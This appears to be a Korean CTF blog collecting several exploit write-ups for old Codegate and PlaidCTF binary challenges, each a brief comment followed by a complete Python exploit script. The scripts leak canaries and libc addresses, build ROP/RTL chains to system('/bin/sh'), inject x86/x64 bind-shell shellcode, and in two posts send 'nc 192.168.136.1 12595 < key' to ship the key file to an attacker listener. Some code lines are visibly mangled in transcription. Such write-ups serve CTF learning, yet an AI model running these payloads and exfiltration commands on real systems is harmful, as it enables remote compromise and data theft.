푸는데 오래걸리지는 않았지만 릭이 안 되는 경우가 가끔 있어서 짜증났던 문제.

이걸 스택 스프레이라고 불러도 될지 모르겠지만 어쨌든 남아있는 영역에서 참조하는게 문제가 되는 케이스이므로 그렇게 썼다. 이제 Bookstore2도 해야 하고...과제도... 으아아


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
from hackutil import *
from socket import *
from time import *
from telnetlib import *
 
HOST = '192.168.136.169'
PORT = 31330
 
#====================================================
offset_func1_read = 0xd2
adminID = 'helloadmin'
adminPW = 'iulover!@#$'
#====================================================
 
banner()
 
print "===================[ Phase 1 : Leak FuncPointer ]=================="
 
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((HOST, PORT))
 
sock.recv(1024)
sock.send(adminID)
sleep(0.1)
sock.recv(1024)
sock.send(adminPW)
sleep(0.1)
sock.recv(1024)
 
sock.send('1\n'# addBook
sleep(0.1)
sock.recv(2046)
 
sock.send('A'# name
sleep(0.1)
sock.recv(2046)
 
sock.send('A'# desc
sleep(0.1)
sock.recv(2046)
 
sock.send('0\n'# book
sleep(0.1)
sock.recv(2046)
 
sock.send('2\n'# modify
sleep(0.1)
sock.recv(2046)
 
sock.send('0\n')
sleep(0.1)
sock.recv(2046)
 
sock.send('3\n'# all
sleep(0.1)
sock.recv(2046)
 
sock.send(str(0x33333333)+'\n'# stock
sleep(0.1)
sock.recv(2046)
 
sock.send(str(0x34343434)+'\n'# price
sleep(0.1)
sock.recv(2046)
 
sock.send('1\n'# ship
sleep(0.1)
sock.recv(2046)
 
sock.send('1\n'# available
sleep(0.1)
sock.recv(2046)
 
sock.send('A'*20# name
sleep(0.1)
sock.recv(2046
 
sock.send('B'*20# description
sleep(0.1)
sock.recv(2046)
 
sock.send('0\n'# back
sleep(0.1)
sock.recv(2046)
 
#============================================
 
sock.send('4\n'# view
sleep(0.1)
 
data = sock.recv(2048)
#sleep(0.1)
funcptr1 = up32(data[data.find('3333')+4:data.find('3333')+8])[0]
readFile = funcptr1 - offset_func1_read
print "[*] Find funcptr1 : "+hex(funcptr1)
print "[*] Find ReadFile : "+hex(readFile)
 
 
#mainmenu
 
#modify_name
 
print "================[ Phase 2 : Attack with Stack Spray ]==============="
 
sock.send('2\n'# modify
sleep(0.1)
sock.recv(2046)
 
sock.send('0\n')
sleep(0.1)
sock.recv(2046)
 
sock.send('1\n'# name
sleep(0.1)
sock.recv(2046)
 
sock.send(p32(readFile)*125)
sleep(0.1)
sock.recv(2046)
 
#============================================
 
sock.send('3\n'# all
sleep(0.1)
sock.recv(2046)
 
sock.send('1234\n'# stock
sleep(0.1)
sock.recv(2046)
 
sock.send('1234\n'# price
sleep(0.1)
sock.recv(2046)
 
sock.send('0\n'# ship
sleep(0.1)
sock.recv(2046)
 
sock.send('1\n'# available
sleep(0.1)
sock.recv(2046)
 
sock.send('/home/bookstore/key\x00'# name
sleep(0.1)
sock.recv(2046)
 
sock.send('Fxxx_Bookstore'# desc
sleep(0.1)
sock.recv(2046)
 
sock.send('4\n')
sleep(0.1)
sock.recv(2046)
 
sock.send('1\n')
sleep(0.1)
sock.recv(2046)
 
sock.send('0\n')
sleep(0.1)
sock.recv(2046)
 
sock.send('3\n'# view
sleep(0.1)
sock.recv(2046)
 
sock.send('0\n')
sleep(0.1)
data = sock.recv(2048)
print "Key : "+data[data.find('Fxxx_Bookstore')+15:data.find('\n', data.find('Fxxx_Bookstore')+15)]
 
sock.close()
cs


'CTF > 지난 대회' 카테고리의 다른 글

Codegate 2013 Prequal - vuln 300  (0) 2015.11.21
Codegate 2013 Prequal - vuln 200  (0) 2015.11.21
Layer7 CTF 2015 - Spil..Spli....SPPPPPIILL  (0) 2015.11.03
Codegate 2013 Prequal - vuln 100  (0) 2015.10.30
PlaidCTF 2013 - pork  (0) 2015.10.29
블로그 이미지

__미니__

E-mail : skyclad0x7b7@gmail.com 나와 계약해서 슈퍼 하-카가 되어 주지 않을래?

,

별로 어렵지는 않았지만 argv[0]주소를 찾기 위해 브루트 포싱을 했더니 조금 귀찮았던 문제.

xinetd 데몬으로 돌아가고 있어서 쉘따기가 참 쉬웠다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
from hackutil import *
from socket import *
from time import *
from telnetlib import *
 
HOST = '192.168.136.153'
PORT = 9880
 
#=======================================
system = 0x08048610
freeadd = 0x0804b0E0
#=======================================
 
banner()
 
print "===================[ Phase 1 : Password leak ]=================="
 
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
 
s.recv(1024)
s.send('A'*0x11d+p32(0x0804b060)+'\n')
sleep(0.1)
data = s.recv(1024)
passwd = data[data.find("***: ")+5:data.find(" terminated")]
print "[*] Found Password : "+passwd
 
print "============[ Phase 2 : Ready to RTL, Canary leak ]============="
 
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
 
s.recv(1024)
s.send(passwd+'\n')
s.recv(1024)
s.recv(1024)
s.send('2\n')
sleep(0.2)
s.recv(1024)
s.send('1\n')
sleep(0.2)
s.recv(1024)
s.send('4\n')
sleep(0.2)
s.recv(1024)
s.send('A'*0x15+'\n')
sleep(0.2)
s.recv(1024)
s.send('/bin/sh\x00\n')
print '[*] Inject "/bin/sh"'
sleep(0.2)
s.recv(1024)
s.send('Mini\n')
sleep(0.2)
data = s.recv(1024)
data.encode('hex')
canary = data[data.find('AAA\n')+4:data.find('Wow')]
if(len(canary)<4):
    canary = "\x00"*(4-len(canary)) + canary
canary = up32(canary)[0]
print "[*] Found canary : "+hex(canary)
 
print "==================[ Phase 3 : Attack with RTL ]================="
 
s.send('3\n')
sleep(0.2)
s.recv(1024)
payload = 'A'*0xd9+p32(canary)+"A"*0xC+p32(system)+"AAAA"+p32(freeadd)
print "[*] Length of Payload : "+str(len(payload))
s.send(payload+'\n')
print "[*] Payload Injected"
sleep(1)
s.recv(1024)
 
s.send('0\n')
sleep(0.2)
s.recv(1024)
 
s.send('1\n')
sleep(0.2)
s.recv(1024)
 
print "===================[ Phase 4 : Got the shell ]=================="
 
= Telnet()
t.sock = s
t.interact()
cs


'CTF > 지난 대회' 카테고리의 다른 글

Codegate 2013 Prequal - vuln 200  (0) 2015.11.21
Codegate 2015 - Bookstore  (0) 2015.11.16
Codegate 2013 Prequal - vuln 100  (0) 2015.10.30
PlaidCTF 2013 - pork  (0) 2015.10.29
Codegate 2014 - AngryDoraemon  (0) 2015.10.25
블로그 이미지

__미니__

E-mail : skyclad0x7b7@gmail.com 나와 계약해서 슈퍼 하-카가 되어 주지 않을래?

,

왠지 스택이 릭되지 않는 문제가 가끔 있긴 한데 어쨌든 작동은 한다.

memcpy로 strcpy로 덮일 dest의 주소를 덮어서 원하는 주소에 값을 덮어쓰고, 이를 이용해 RET을 버퍼 주소로 이동시켜 NOP Sled를 타고 쉘코드가 실행되게 한다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
from hackutil import *
from socket import *
from telnetlib import *
 
HOST = "192.168.136.152"
PORT = 6666
 
#================================================================
shellcode = ("\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2"
        "\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c"
        "\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05"
        "\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89"
        "\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f"
        "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21"
        "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68"
        "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89"
        "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05")
#================================================================
 
banner()
 
print "==================[ Phase 1 : Stack leak ]=================="
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((HOST, PORT))
 
payload = "\x00"*0x108
time.sleep(0.1)
sock.send('arsenal\n')
time.sleep(0.1)
sock.recv(1024)
sock.send('gyeongbokgung\n')
time.sleep(0.1)
sock.recv(1024)
sock.send('psy\n')
time.sleep(0.1)
sock.recv(1024)
sock.send(payload)
time.sleep(0.1)
 
data = up64(sock.recv(2048)[0x108:0x110])[0]
print "[*] Find Stack : "+hex(data)
 
sock.close()
print "=============[ Phase 2 : Attack with Shellcode ]============"
 
sock2 = socket(AF_INET, SOCK_STREAM)
sock2.connect((HOST, PORT))
payload = "\x90"*20 + shellcode + "\x90"*(0x108-20-len(shellcode)) + p64(data+16)
print "Payload Length : "+hex(len(payload))
time.sleep(0.1)
sock2.send('arsenal\n')
time.sleep(0.1)
sock2.recv(1024)
sock2.send('gyeongbokgung\n')
time.sleep(0.1)
sock2.recv(1024)
sock2.send('psy\n')
time.sleep(0.1)
sock2.recv(1024)
sock2.send(payload)
time.sleep(2)
 
print "=================[ Phase 3 : Got the Shell ]================"
 
sock3 = socket(AF_INET, SOCK_STREAM)
sock3.connect((HOST, 4444))
= Telnet()
t.sock = sock3
t.interact()
cs


'CTF > 지난 대회' 카테고리의 다른 글

Codegate 2015 - Bookstore  (0) 2015.11.16
Layer7 CTF 2015 - Spil..Spli....SPPPPPIILL  (0) 2015.11.03
PlaidCTF 2013 - pork  (0) 2015.10.29
Codegate 2014 - AngryDoraemon  (0) 2015.10.25
Plaid CTF 2013 - ropasaurusrex  (0) 2015.10.22
블로그 이미지

__미니__

E-mail : skyclad0x7b7@gmail.com 나와 계약해서 슈퍼 하-카가 되어 주지 않을래?

,

후, RTL로 RTL을 만드는 문제라고 하던 후배의 말이 뭔지 알수 있는 문제였다.

여러 가지 기법이 조합되어서 풀 수 있었던 문제.

RTL을 위한 인자를 직접 하나하나 다 만들고 쉘코드를 받아오고 RTL 도중 FEBP까지...

풀고나니 홀가분하고 나름 재미있었던 문제였다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
from hackutil import *
from socket import *
from time import *
from telnetlib import *
 
HOST = '192.168.136.152'
PORT = 33227
 
#======================================
buf_len = 1020
sprintf_plt = 0x0804887C
ppppr = 0x080499a5
bss = 0x0804ad44
freespace = 0x0804ab40
leave_ret = 0x08048b71
ret_arg = [ 0x8048acc0x80499c30x80499c40x8049990
            0x80499c40x080490500x080490500x08049050
            0x8048acc0x80499c30x80499c40x8049990
            0x080496800x080490500x080490500x08049050]
shellcode = ("\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89"
            "\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39"
            "\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0"
            "\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56"
            "\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f"
            "\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68"
            "\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80")
read_plt = 0x0804893C
read_got = 0x0804AC98
 
# RET = \x40\xab\x04\x08
# fd = \x04\x00\x00\x00
# target = \x40\xab\x04\x08
# length = \x54\x00\x00\x00
#======================================
 
banner()
 
print "===================[ Phase 1 : Attack with Shellcode ]=================="
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
 
payload = 'A'*buf_len+'AAAA'
payload += p32(sprintf_plt) + p32(ppppr+2+ p32(bss-4+ p32(read_got)
for i in range(len(ret_arg)):
    payload += p32(sprintf_plt) + p32(ppppr+2+ p32(bss+i) + p32(ret_arg[i])
payload += p32(ppppr+3+ p32(bss-8+ p32(leave_ret)
print "[*] Payload Length : "+str(len(payload))
print "[*] Send payload"
s.send('GET http://'+payload+' HTTP/1.1')
sleep(1)
print "[*] Send \\r\\n"
s.send('\r\n')
sleep(1)
print "[*] Send Shellcode"
s.send(shellcode)
sleep(1)
 
print "======================[ Phase 1 : Got the Shell ]======================"
s2 = socket(AF_INET, SOCK_STREAM)
s2.connect((HOST, 1337))
= Telnet()
t.sock = s2
t.interact()
cs


'CTF > 지난 대회' 카테고리의 다른 글

Layer7 CTF 2015 - Spil..Spli....SPPPPPIILL  (0) 2015.11.03
Codegate 2013 Prequal - vuln 100  (0) 2015.10.30
Codegate 2014 - AngryDoraemon  (0) 2015.10.25
Plaid CTF 2013 - ropasaurusrex  (0) 2015.10.22
Codegate Junior 2014 Prequal - nuclear  (0) 2015.10.22
블로그 이미지

__미니__

E-mail : skyclad0x7b7@gmail.com 나와 계약해서 슈퍼 하-카가 되어 주지 않을래?

,

처음에 볼땐 환경구축에 필요한 게 참 많길래 어려운 문젠가 싶었으나 오히려 Nuclear보다 쉽게 풀었다.

이번에는 쉘따려고 고생하지 않고 바로 key를 출력하도록 했다.

푸는데 걸린 시간 약 2시간 반...?


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
from hackutil import *
from socket import *
from time import *
 
HOST = '192.168.136.139'
PORT = 8888
 
#==============================================
pppr = 0x08048b2c
ppppr = 0x080495bc
read_plt = 0x08048620
read_got = 0x0804B010
write_plt = 0x080486E0
write_got = 0x0804B040
libc_main_got = 0x0804B038
offset_read_system = 0x9aa40
binsh = 0x0804970D
bss = 0x0804b080
#==============================================
 
banner()
 
print "===================[ Phase 1 : Canary leak ]=================="
 
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
sleep(2)
s.recv(1024)
s.send('4')
sleep(0.2)
s.recv(1024)
 
payload = 'y'*11
 
s.send(payload)
sleep(0.1)
 
data = s.recv(1024)
 
canary =  up32(data[22:26])[0& 0xFFFFFF00
print "[*] Found Canary : "+hex(canary)
s.close()
 
print "==================[ Phase 2 : Library leak ]=================="
 
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
sleep(2)
s.recv(1024)
s.send('4')
sleep(0.2)
s.recv(1024)
 
payload2 = 'y'*10 + p32(canary) + 'A'*12
payload2 += p32(write_plt) + p32(pppr) + p32(4+ p32(read_got) + p32(4)
payload2 += p32(write_plt) + p32(pppr) + p32(4+ p32(libc_main_got) + p32(4)
 
s.send(payload2)
sleep(0.1)
 
data = s.recv(1024)
read_lib = up32(data[0:4])[0]
libc_main_lib =  up32(data[4:8])[0]
system_lib = read_lib - offset_read_system
 
print "[*] Found read_lib : "+hex(read_lib)
print "[*] Found libc_main_lib : "+hex(libc_main_lib)
print "[*] Found system_lib : "+hex(system_lib)
print '[*] &"/bin/sh" : '+hex(binsh)
 
s.close()
 
print "================[ Phase 3 : Attack with RTL ]================="
 
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
sleep(2)
s.recv(1024)
s.send('4')
sleep(0.2)
s.recv(1024)
 
payload3 = 'y'*10 + p32(canary) + 'A'*12
payload3 += p32(read_plt) + p32(pppr) + p32(4+ p32(bss) + p32(0x100)
payload3 += p32(system_lib) + "AAAA" + p32(bss)
 
s.send(payload3)
sleep(0.1)
s.send('nc 192.168.136.1 12595 < key')
sleep(0.1)
 
s.close()
 
print "==================[ Phase 4 : Got the Key ]==================="
cs


'CTF > 지난 대회' 카테고리의 다른 글

Layer7 CTF 2015 - Spil..Spli....SPPPPPIILL  (0) 2015.11.03
Codegate 2013 Prequal - vuln 100  (0) 2015.10.30
PlaidCTF 2013 - pork  (0) 2015.10.29
Plaid CTF 2013 - ropasaurusrex  (0) 2015.10.22
Codegate Junior 2014 Prequal - nuclear  (0) 2015.10.22
블로그 이미지

__미니__

E-mail : skyclad0x7b7@gmail.com 나와 계약해서 슈퍼 하-카가 되어 주지 않을래?

,

대회에서 라이브러리 파일을 주고 시작했고, 따라서 로컬에서 디버깅이 가능한 상황이라고 가정하고 환경은

Ubuntu 14.04 64bit 로 구축해놓고 풀었습니다.

가장 기초적인 ROP로, Demon으로 돌아가는 프로그램이었기 때문에 system("/bin/sh")로 쉘을 딸 수 있었습니다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
from hackutil import *
from socket import *
from time import *
from telnetlib import *
 
TARGET = '192.168.136.137'
PORT = 9999
 
banner()
 
#========================================
read_plt = 0x0804832c
read_got = 0x0804961c
write_plt = 0x0804830c
write_got = 0x08049614
pppr = 0x080484b6
offset_read_system = 0x9aa40
offset_binsh_read = 0x85e54
#========================================
 
print "==================[ Phase 1 : Find Library Func ]=================="
 
= socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, PORT))
payload = "\x90"*(0x88+4)
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)
payload += p32(0x080483F4# vuln func again
 
s.send(payload)
sleep(0.1)
recved = s.recv(1024)
 
read_lib = up32(recved[0:4])[0]
system_lib = read_lib - offset_read_system
binsh = read_lib+offset_binsh_read
 
print "[*] Found read_lib : "+hex(read_lib)
sleep(0.3)
print "[*] Found system_lib : "+hex(system_lib)
sleep(0.3)
print "[*] Found binsh : "+hex(binsh)
 
print "===================[ Phase 2 : Attack with RTL ]==================="
 
payload2 = "\x90"*(0x88+4)
payload2 += p32(system_lib)
payload2 += "AAAA"
payload2 += p32(binsh)
 
s.send(payload2)
sleep(1)
 
print "====================[ Phase 3 : Got the Shell ]===================="
 
= Telnet()
t.sock = s
t.interact()
 
cs


'CTF > 지난 대회' 카테고리의 다른 글

Layer7 CTF 2015 - Spil..Spli....SPPPPPIILL  (0) 2015.11.03
Codegate 2013 Prequal - vuln 100  (0) 2015.10.30
PlaidCTF 2013 - pork  (0) 2015.10.29
Codegate 2014 - AngryDoraemon  (0) 2015.10.25
Codegate Junior 2014 Prequal - nuclear  (0) 2015.10.22
블로그 이미지

__미니__

E-mail : skyclad0x7b7@gmail.com 나와 계약해서 슈퍼 하-카가 되어 주지 않을래?

,

서버 환경을 몰라서 Ubuntu 14.04 64bit에 Full ASLR 환경으로 설정 후 풀었습니다.

원래 처음엔 mprotect 함수를 이용하여 쉘을 따려고 했으나 잘 되지 않아서 그냥 키 값만 읽어오도록 했습니다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
from hackutil import *
from time import *
from socket import *
 
# ==========================================
leak = 'A'*0x200
recv_plt = 0x080488E0
recv_got = 0x0804B074
send_plt = 0x08048900
ppppr = 0x0804917c
vuln_func = 0x08048B5B
data_ = 0x0804b090
offset_system_recv = 0x1010
# ==========================================
 
banner()
 
print "==================[ Phase 1 : Passcode leak ]=================="
 
= socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.136.137'1129))
s.recv(1024)
s.send('target\n')
sleep(0.1)
s.recv(1024)
s.send('1234.12341234/1234.12341234\n')
sleep(0.1)
s.recv(1024)
s.send(leak+'\n')
sleep(0.1)
data = s.recv(1024)
passcode = data[len(leak)+30:len(leak)+30+0x04]
print "[*] passcode : "+passcode
s.close()
 
print "================[ Phase 2 : Find Library Func ]================"
 
s2 = socket(AF_INET, SOCK_STREAM)
s2.connect(('192.168.136.137'1129))
s2.recv(1024)
s2.send('launch\n')
sleep(0.1)
s2.recv(1024)
 
payload2 = 'A'*(0x20C+4)
payload2 += p32(send_plt) + p32(ppppr) + p32(4+ p32(recv_got) + p32(4+ p32(0)
payload2 += p32(vuln_func) + p32(0+ p32(4)
 
s2.send(passcode+"\n")
sleep(0.1)
s2.recv(1024)
s2.send(payload2)
sleep(0.1)
recv_lib = up32(s2.recv(1024)[0:4])[0]
system_lib = recv_lib + offset_system_recv
 
print "[*] Found recv_lib : "+hex(recv_lib)
print "[*] Found system_lib : "+hex(system_lib)
 
 
print "=================[ Phase 3 : Attack with RTL ]================="
 
payload3 = 'A'*(0x20c+4)
payload3 += p32(recv_plt) + p32(ppppr) + p32(4+ p32(data_) + p32(0xff+ p32(0)
payload3 += p32(system_lib) + "AAAA" + p32(data_)
 
s2.send(payload3)
sleep(0.1)
s2.send('nc 192.168.136.1 12595 < key')
s2.close()
print "========================[ Got the Key ]========================"
cs


'CTF > 지난 대회' 카테고리의 다른 글

Layer7 CTF 2015 - Spil..Spli....SPPPPPIILL  (0) 2015.11.03
Codegate 2013 Prequal - vuln 100  (0) 2015.10.30
PlaidCTF 2013 - pork  (0) 2015.10.29
Codegate 2014 - AngryDoraemon  (0) 2015.10.25
Plaid CTF 2013 - ropasaurusrex  (0) 2015.10.22
블로그 이미지

__미니__

E-mail : skyclad0x7b7@gmail.com 나와 계약해서 슈퍼 하-카가 되어 주지 않을래?

,